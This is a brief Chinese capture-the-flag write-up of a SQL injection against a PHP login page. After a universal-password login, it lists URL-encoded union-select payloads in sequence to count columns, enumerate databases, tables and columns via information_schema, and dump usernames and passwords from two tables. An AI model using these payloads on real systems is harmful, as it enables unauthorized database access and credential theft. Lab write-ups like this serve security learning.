万能密码尝试登陆,跳转到check.php
猜字段数:?username=admina'+order+by+3+%23&password=1
构造注入语句:?username=admina%27+union+select+1,2,3+%23&password=1
当前数据库:?username=admina%27+union+select+1,2,(select+database())+%23&password=1
看看有哪些库,也一起看看geek库有那些表:
?username=admina%27+union+select+1,(select+group_concat(schema_name)+from+information_schema.schemata),(select+group_concat(table_name)+from+information_schema.tables+where+table_schema='geek')+%23&password=1
看下geekuser和l0ve1ysq1有哪些字段:
?username=admina%27+union+select+1,(select+group_concat(column_name)+from+information_schema.columns+where+table_name='geekuser'),(select+group_concat(column_name)+from+information_schema.columns+where+table_name='l0ve1ysq1')+%23&password=1
字段是一样的,那两个一起看:
?username=admina%27+union+select+1,(select+concat(id,0x7e,username,0x7e,password)+from+geekuser),(select+group_concat(id,username,password)+from+l0ve1ysq1)+%23&password=1
